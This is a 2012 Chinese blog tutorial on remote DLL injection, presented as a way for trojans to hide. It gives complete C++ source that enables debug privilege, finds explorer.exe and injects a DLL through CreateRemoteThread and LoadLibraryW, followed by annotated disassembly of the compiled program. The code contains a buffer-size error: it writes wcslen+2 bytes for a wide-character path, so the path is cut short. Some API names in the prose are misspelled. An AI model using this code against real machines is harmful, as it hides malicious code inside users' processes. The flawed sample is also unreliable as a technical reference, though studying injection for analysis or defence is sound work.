远程注入技术(样例源码及反汇编分析)

dll既动态链接库由多个功能函数构成,不独立运行,不会出现在进程列表中,dll作为进程的一部分很难被发现。因此是dll注入是木马很好的隐藏方式。

进行远程注入的方法:提升进程权限至Debug模式(因为只有Debug模式才能打开进程句柄),打开远程进程,将需要的信息写入远程进程的内存,启动远程线程加载dll。

进程提升:

OpenProcessToken()打开进程令牌

LoopupPrivilegeValue()返回一个本地系统独一无二的ID,用于系统权限的提升。

AdjustTokenPrivileges()更改进程权限.

进程提升完毕就有权限开启别的进程

Openprocess()打开进程

VirtuallAlloc()在目标进程中申请内存

WriteProcessMemory()在目标进程中写入需要的数据

CreateRemoteThread()创建远程线程。

在目标进程中启动的新线程用的是loadlibrary来加载要注入的dll。但在这之前要知道loadlibrary的地址。这里只是简单的介绍进程注入的方法,看了下面的源码会理解很多。

// 远程注入dll.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <iostream>
#include <windows.h>
#include <TlHelp32.h>
using namespace std;
bool EnableDebugPrivilege();
bool InjectDll(LPCTSTR DLLPath,const DWORD dwProcessID);
DWORD GetProcess_Id();
int _tmain(int argc, _TCHAR* argv[])
{
 WCHAR DllPath[MAX_PATH];
 GetCurrentDirectory(MAX_PATH,DllPath);
 wcscat(DllPath,L"\\testdll.dll");//设置dll的绝对路径
 InjectDll(DllPath,GetProcess_Id());
 return 0;
}
bool EnableDebugPrivilege()//提升进程权限
{
 bool fOK = false; //Assume function fails
 HANDLE hToken;
 //Try to open this process's acess token
 if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
 {
  //Attempt to modify the "Debug" privilege
  TOKEN_PRIVILEGES tp;
  tp.PrivilegeCount = 1;
  LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
  tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
  fOK = (GetLastError() == ERROR_SUCCESS);
  CloseHandle(hToken);
 }
 return fOK;
}
bool InjectDll(LPCTSTR DLLPath,const DWORD dwProcessID)//注入部分
{
 LPTSTR Remotedllnameaddr;
 HANDLE RemoteHandle;
 HANDLE ThreadHandle;
 EnableDebugPrivilege();//提升当前进程权限
 RemoteHandle=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessID);//打开要注入的进程
 Remotedllnameaddr=LPTSTR(VirtualAllocEx(RemoteHandle,NULL,wcslen(DLLPath)+2,MEM_COMMIT,PAGE_READWRITE));//在要注入的进程空间内申请内存为写入dll名做准备
 WriteProcessMemory(RemoteHandle,Remotedllnameaddr,DLLPath,wcslen(DLLPath)+2,NULL);//写dll名
 PTHREAD_START_ROUTINE FunAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")),"LoadLibraryW");//获取loadlibrary地址
 ThreadHandle=CreateRemoteThread(RemoteHandle,NULL,0,FunAddr,Remotedllnameaddr,0,NULL);//创建远程线程
 if(ThreadHandle==NULL)
 {
  cout<<"注入失败";
  return false;
 }
 Sleep(500);
 CloseHandle(ThreadHandle);
 CloseHandle(RemoteHandle);
 return true;
}
DWORD GetProcess_Id()//获取explore.exe的进程ID
{
 DWORD pid=-1;
 HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//创建系统快照,返回快照句柄
 PROCESSENTRY32 D_Process;
 ZeroMemory(&D_Process,sizeof(D_Process));
 D_Process.dwSize=sizeof(D_Process);
 PTSTR ExeName=L"explorer.exe";
 Process32First(hSnap,&D_Process);//取得系统快照中第一个进程的信息
 if(wcsstr(D_Process.szExeFile,ExeName))//判断是不是explore.exe
 {
  pid=D_Process.th32ProcessID;
  return pid;
 }
 while (1)//枚举
 {
  ZeroMemory(&D_Process,sizeof(D_Process));
  D_Process.dwSize=sizeof(D_Process);
  if(!Process32Next(hSnap,&D_Process))
  {
   pid=-1;
   return pid;
  }
  if(wcsstr(D_Process.szExeFile,ExeName))
  {
   pid=D_Process.th32ProcessID;
   return pid;
  }
 }
}

下面是这个简单的注入程序的反汇编代码。可以比较学习

主函数部分

wmain           proc near               ; CODE XREF: j_wmainj
.text:00411F90
.text:00411F90 var_2D4         = byte ptr -2D4h
.text:00411F90 currentdirectorypath= word ptr -210h
.text:00411F90 var_4           = dword ptr -4
.text:00411F90
.text:00411F90                 push    ebp
.text:00411F91                 mov     ebp, esp
.text:00411F93                 sub     esp, 2D4h
.text:00411F99                 push    ebx
.text:00411F9A                 push    esi
.text:00411F9B                 push    edi
.text:00411F9C                 lea     edi, [ebp+var_2D4]
.text:00411FA2                 mov     ecx, 0B5h
.text:00411FA7                 mov     eax, 0CCCCCCCCh
.text:00411FAC                 rep stosd               ; 变量赋初值为0
.text:00411FAE                 mov     eax, __security_cookie
.text:00411FB3                 xor     eax, ebp
.text:00411FB5                 mov     [ebp+var_4], eax
.text:00411FB8                 mov     esi, esp
.text:00411FBA                 lea     eax, [ebp+currentdirectorypath]
.text:00411FC0                 push    eax             ; lpBuffer
.text:00411FC1                 push    104h            ; nBufferLength
.text:00411FC6                 call    ds:__imp__GetCurrentDirectoryW@8 ; GetCurrentDirectoryW(x,x)
.text:00411FCC                 cmp     esi, esp        ; 获取程序所在目录的路径
.text:00411FCE                 call    j__RTC_CheckEsp
.text:00411FD3                 mov     esi, esp
.text:00411FD5                 push    offset Source   ; "\\testdll.dll"
.text:00411FDA                 lea     eax, [ebp+currentdirectorypath]
.text:00411FE0                 push    eax             ; Dest
.text:00411FE1                 call    ds:__imp__wcscat ; %Currentdirectory%\\testdll.dll
.text:00411FE7                 add     esp, 8
.text:00411FEA                 cmp     esi, esp
.text:00411FEC                 call    j__RTC_CheckEsp
.text:00411FF1                 call    j_GetProcess_Id ; 查找进程explorer.exe的id
.text:00411FF6                 push    eax
.text:00411FF7                 lea     eax, [ebp+currentdirectorypath]
.text:00411FFD                 push    eax
.text:00411FFE                 call    j_InjectDll
.text:00412003                 add     esp, 8
.text:00412006                 xor     eax, eax
.text:00412008                 push    edx
.text:00412009                 mov     ecx, ebp
.text:0041200B                 push    eax
.text:0041200C                 lea     edx, dword_412038
.text:00412012                 call    j__RTC_CheckStackVars
.text:00412017                 pop     eax
.text:00412018                 pop     edx
.text:00412019                 pop     edi
.text:0041201A                 pop     esi
.text:0041201B                 pop     ebx
.text:0041201C                 mov     ecx, [ebp+var_4]
.text:0041201F                 xor     ecx, ebp
.text:00412021                 call    j___security_check_cookie
.text:00412026                 add     esp, 2D4h
.text:0041202C                 cmp     ebp, esp
.text:0041202E                 call    j__RTC_CheckEsp
.text:00412033                 mov     esp, ebp
.text:00412035                 pop     ebp
.text:00412036                 retn
.text:00412036 wmain           endp
.text:00412036

获取expolrer。exe的进程id
.text:004118A0 GetProcess_Id   proc near               ; CODE XREF: j_GetProcess_Idj
.text:004118A0
.text:004118A0 var_31C         = byte ptr -31Ch
.text:004118A0 var_258         = dword ptr -258h
.text:004118A0 Dst             = dword ptr -24Ch
.text:004118A0 var_244         = dword ptr -244h
.text:004118A0 var_228         = byte ptr -228h
.text:004118A0 hSnapshot       = dword ptr -18h
.text:004118A0 var_C           = dword ptr -0Ch
.text:004118A0 var_4           = dword ptr -4
.text:004118A0
.text:004118A0                 push    ebp
.text:004118A1                 mov     ebp, esp
.text:004118A3                 sub     esp, 31Ch
.text:004118A9                 push    ebx
.text:004118AA                 push    esi
.text:004118AB                 push    edi
.text:004118AC                 lea     edi, [ebp+var_31C]
.text:004118B2                 mov     ecx, 0C7h
.text:004118B7                 mov     eax, 0CCCCCCCCh
.text:004118BC                 rep stosd
.text:004118BE                 mov     eax, __security_cookie
.text:004118C3                 xor     eax, ebp
.text:004118C5                 mov     [ebp+var_4], eax
.text:004118C8                 mov     [ebp+var_C], 0FFFFFFFFh
.text:004118CF                 push    0               ; th32ProcessID
.text:004118D1                 push    2               ; dwFlags
.text:004118D3                 call    j__CreateToolhelp32Snapshot@8 ; CreateToolhelp32Snapshot(x,x)
.text:004118D8                 mov     [ebp+hSnapshot], eax ; 创建进程快照
.text:004118DB                 push    22Ch            ; Size
.text:004118E0                 push    0               ; Val
.text:004118E2                 lea     eax, [ebp+Dst]
.text:004118E8                 push    eax             ; Dst
.text:004118E9                 call    j__memset
.text:004118EE                 add     esp, 0Ch
.text:004118F1                 mov     [ebp+Dst], 22Ch
.text:004118FB                 mov     [ebp+var_258], offset aExplorer_exe ; "explorer.exe"
.text:00411905                 lea     eax, [ebp+Dst]
.text:0041190B                 push    eax             ; lppe
.text:0041190C                 mov     ecx, [ebp+hSnapshot]
.text:0041190F                 push    ecx             ; hSnapshot
.text:00411910                 call    j__Process32FirstW@8 ; Process32FirstW(x,x)
.text:00411915                 mov     eax, [ebp+var_258]
.text:0041191B                 push    eax
.text:0041191C                 lea     ecx, [ebp+var_228]
.text:00411922                 push    ecx
.text:00411923                 call    j_wcsstr_0
.text:00411928                 add     esp, 8
.text:0041192B                 test    eax, eax
.text:0041192D                 jz      short loc_41193D
.text:0041192F                 mov     eax, [ebp+var_244]
.text:00411935                 mov     [ebp+var_C], eax
.text:00411938                 mov     eax, [ebp+var_C]
.text:0041193B                 jmp     short loc_4119B0
.text:0041193D ; ---------------------------------------------------------------------------
.text:0041193D
.text:0041193D loc_41193D:                             ; CODE XREF: GetProcess_Id+8Dj
.text:0041193D                                         ; GetProcess_Id:loc_4119AEj
.text:0041193D                 mov     eax, 1
.text:00411942                 test    eax, eax
.text:00411944                 jz      short loc_4119B0
.text:00411946                 push    22Ch            ; Size
.text:0041194B                 push    0               ; Val
.text:0041194D                 lea     eax, [ebp+Dst]
.text:00411953                 push    eax             ; Dst
.text:00411954                 call    j__memset
.text:00411959                 add     esp, 0Ch
.text:0041195C                 mov     [ebp+Dst], 22Ch
.text:00411966                 lea     eax, [ebp+Dst]
.text:0041196C                 push    eax             ; lppe
.text:0041196D                 mov     ecx, [ebp+hSnapshot]
.text:00411970                 push    ecx             ; hSnapshot
.text:00411971                 call    j__Process32NextW@8 ; Process32NextW(x,x)
.text:00411976                 test    eax, eax        ; 循环查找进程
.text:00411978                 jnz     short loc_411986
.text:0041197A                 mov     [ebp+var_C], 0FFFFFFFFh
.text:00411981                 mov     eax, [ebp+var_C]
.text:00411984                 jmp     short loc_4119B0
.text:00411986 ; ---------------------------------------------------------------------------
.text:00411986
.text:00411986 loc_411986:                             ; CODE XREF: GetProcess_Id+D8j
.text:00411986                 mov     eax, [ebp+var_258]
.text:0041198C                 push    eax
.text:0041198D                 lea     ecx, [ebp+var_228]
.text:00411993                 push    ecx
.text:00411994                 call    j_wcsstr_0
.text:00411999                 add     esp, 8
.text:0041199C                 test    eax, eax
.text:0041199E                 jz      short loc_4119AE
.text:004119A0                 mov     eax, [ebp+var_244]
.text:004119A6                 mov     [ebp+var_C], eax
.text:004119A9                 mov     eax, [ebp+var_C]
.text:004119AC                 jmp     short loc_4119B0
.text:004119AE ; ---------------------------------------------------------------------------
.text:004119AE
.text:004119AE loc_4119AE:                             ; CODE XREF: GetProcess_Id+FEj
.text:004119AE                 jmp     short loc_41193D
.text:004119B0 ; ---------------------------------------------------------------------------
.text:004119B0
.text:004119B0 loc_4119B0:                             ; CODE XREF: GetProcess_Id+9Bj
.text:004119B0                                         ; GetProcess_Id+A4j ...
.text:004119B0                 push    edx
.text:004119B1                 mov     ecx, ebp
.text:004119B3                 push    eax
.text:004119B4                 lea     edx, dword_4119E0
.text:004119BA                 call    j__RTC_CheckStackVars
.text:004119BF                 pop     eax
.text:004119C0                 pop     edx
.text:004119C1                 pop     edi
.text:004119C2                 pop     esi
.text:004119C3                 pop     ebx
.text:004119C4                 mov     ecx, [ebp+var_4]
.text:004119C7                 xor     ecx, ebp
.text:004119C9                 call    j___security_check_cookie
.text:004119CE                 add     esp, 31Ch
.text:004119D4                 cmp     ebp, esp
.text:004119D6                 call    j__RTC_CheckEsp
.text:004119DB                 mov     esp, ebp
.text:004119DD                 pop     ebp
.text:004119DE                 retn
.text:004119DE GetProcess_Id   endp

 提升权限,创建远程线程

InjectDll       proc near               ; CODE XREF: j_InjectDllj
.text:004116D0
.text:004116D0 var_F0          = byte ptr -0F0h
.text:004116D0 lpStartAddress  = dword ptr -2Ch
.text:004116D0 hObject         = dword ptr -20h
.text:004116D0 hProcess        = dword ptr -14h
.text:004116D0 lpParameter     = dword ptr -8
.text:004116D0 lpBuffer        = dword ptr  8
.text:004116D0 dwProcessId     = dword ptr  0Ch
.text:004116D0
.text:004116D0                 push    ebp
.text:004116D1                 mov     ebp, esp
.text:004116D3                 sub     esp, 0F0h
.text:004116D9                 push    ebx
.text:004116DA                 push    esi
.text:004116DB                 push    edi
.text:004116DC                 lea     edi, [ebp+var_F0]
.text:004116E2                 mov     ecx, 3Ch
.text:004116E7                 mov     eax, 0CCCCCCCCh
.text:004116EC                 rep stosd
.text:004116EE                 call    j_EnableDebugPrivilege ; 提升进程权限值DEBUG
.text:004116F3                 mov     esi, esp
.text:004116F5                 mov     eax, [ebp+dwProcessId]
.text:004116F8                 push    eax             ; dwProcessId
.text:004116F9                 push    0               ; bInheritHandle
.text:004116FB                 push    1FFFFFh         ; dwDesiredAccess
.text:00411700                 call    ds:__imp__OpenProcess@12 ; OpenProcess(x,x,x)
.text:00411706                 cmp     esi, esp
.text:00411708                 call    j__RTC_CheckEsp
.text:0041170D                 mov     [ebp+hProcess], eax
.text:00411710                 mov     esi, esp
.text:00411712                 push    4               ; flProtect
.text:00411714                 push    1000h           ; flAllocationType
.text:00411719                 mov     edi, esp
.text:0041171B                 mov     eax, [ebp+lpBuffer]
.text:0041171E                 push    eax             ; Str
.text:0041171F                 call    ds:__imp__wcslen
.text:00411725                 add     esp, 4
.text:00411728                 cmp     edi, esp
.text:0041172A                 call    j__RTC_CheckEsp
.text:0041172F                 add     eax, 2
.text:00411732                 push    eax             ; dwSize
.text:00411733                 push    0               ; lpAddress
.text:00411735                 mov     ecx, [ebp+hProcess]
.text:00411738                 push    ecx             ; hProcess
.text:00411739                 call    ds:__imp__VirtualAllocEx@20 ; VirtualAllocEx(x,x,x,x,x)
.text:0041173F                 cmp     esi, esp
.text:00411741                 call    j__RTC_CheckEsp
.text:00411746                 mov     [ebp+lpParameter], eax ; 加载dll绝对路径%CurrentDirectory%tsetdll.dll
.text:00411749                 mov     esi, esp
.text:0041174B                 push    0               ; lpNumberOfBytesWritten
.text:0041174D                 mov     edi, esp
.text:0041174F                 mov     eax, [ebp+lpBuffer]
.text:00411752                 push    eax             ; Str
.text:00411753                 call    ds:__imp__wcslen
.text:00411759                 add     esp, 4
.text:0041175C                 cmp     edi, esp
.text:0041175E                 call    j__RTC_CheckEsp
.text:00411763                 add     eax, 2
.text:00411766                 push    eax             ; nSize
.text:00411767                 mov     ecx, [ebp+lpBuffer]
.text:0041176A                 push    ecx             ; lpBuffer
.text:0041176B                 mov     edx, [ebp+lpParameter]
.text:0041176E                 push    edx             ; lpBaseAddress
.text:0041176F                 mov     eax, [ebp+hProcess]
.text:00411772                 push    eax             ; hProcess
.text:00411773                 call    ds:__imp__WriteProcessMemory@20 ; WriteProcessMemory(x,x,x,x,x)
.text:00411779                 cmp     esi, esp
.text:0041177B                 call    j__RTC_CheckEsp
.text:00411780                 mov     esi, esp
.text:00411782                 push    offset ProcName ; "LoadLibraryW"
.text:00411787                 mov     edi, esp
.text:00411789                 push    offset ModuleName ; "Kernel32.dll"
.text:0041178E                 call    ds:__imp__GetModuleHandleW@4 ; GetModuleHandleW(x)
.text:00411794                 cmp     edi, esp
.text:00411796                 call    j__RTC_CheckEsp
.text:0041179B                 push    eax             ; hModule
.text:0041179C                 call    ds:__imp__GetProcAddress@8 ; GetProcAddress(x,x)
.text:004117A2                 cmp     esi, esp
.text:004117A4                 call    j__RTC_CheckEsp ; 获取loadlibrary的地址
.text:004117A9                 mov     [ebp+lpStartAddress], eax
.text:004117AC                 mov     esi, esp
.text:004117AE                 push    0               ; lpThreadId
.text:004117B0                 push    0               ; dwCreationFlags
.text:004117B2                 mov     eax, [ebp+lpParameter]
.text:004117B5                 push    eax             ; lpParameter
.text:004117B6                 mov     ecx, [ebp+lpStartAddress]
.text:004117B9                 push    ecx             ; lpStartAddress
.text:004117BA                 push    0               ; dwStackSize
.text:004117BC                 push    0               ; lpThreadAttributes
.text:004117BE                 mov     edx, [ebp+hProcess]
.text:004117C1                 push    edx             ; hProcess
.text:004117C2                 call    ds:__imp__CreateRemoteThread@28 ; CreateRemoteThread(x,x,x,x,x,x,x)
.text:004117C8                 cmp     esi, esp
.text:004117CA                 call    j__RTC_CheckEsp
.text:004117CF                 mov     [ebp+hObject], eax
.text:004117D2                 cmp     [ebp+hObject], 0
.text:004117D6                 jnz     short loc_4117EF
.text:004117D8                 push    offset aVIZ     ; "注入失败"
.text:004117DD                 mov     eax, ds:__imp_?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A ; std::basic_ostream<char,std::char_traits<char>> std::cout
.text:004117E2                 push    eax
.text:004117E3                 call    j_std__operator___std__char_traits_char___
.text:004117E8                 add     esp, 8
.text:004117EB                 xor     al, al
.text:004117ED                 jmp     short loc_41182B
.text:004117EF ; ---------------------------------------------------------------------------
.text:004117EF
.text:004117EF loc_4117EF:                             ; CODE XREF: InjectDll+106j
.text:004117EF                 mov     esi, esp
.text:004117F1                 push    1F4h            ; dwMilliseconds
.text:004117F6                 call    ds:__imp__Sleep@4 ; Sleep(x)
.text:004117FC                 cmp     esi, esp
.text:004117FE                 call    j__RTC_CheckEsp
.text:00411803                 mov     esi, esp
.text:00411805                 mov     eax, [ebp+hObject]
.text:00411808                 push    eax             ; hObject
.text:00411809                 call    ds:__imp__CloseHandle@4 ; CloseHandle(x)
.text:0041180F                 cmp     esi, esp
.text:00411811                 call    j__RTC_CheckEsp
.text:00411816                 mov     esi, esp
.text:00411818                 mov     eax, [ebp+hProcess]
.text:0041181B                 push    eax             ; hObject
.text:0041181C                 call    ds:__imp__CloseHandle@4 ; CloseHandle(x)
.text:00411822                 cmp     esi, esp
.text:00411824                 call    j__RTC_CheckEsp
.text:00411829                 mov     al, 1
.text:0041182B
.text:0041182B loc_41182B:                             ; CODE XREF: InjectDll+11Dj
.text:0041182B                 pop     edi
.text:0041182C                 pop     esi
.text:0041182D                 pop     ebx
.text:0041182E                 add     esp, 0F0h
.text:00411834                 cmp     ebp, esp
.text:00411836                 call    j__RTC_CheckEsp
.text:0041183B                 mov     esp, ebp
.text:0041183D                 pop     ebp
.text:0041183E                 retn
.text:0041183E InjectDll       endp

posted @ 2012-09-19 21:49  麦小扣_刘  阅读(695)  评论(0编辑  收藏  举报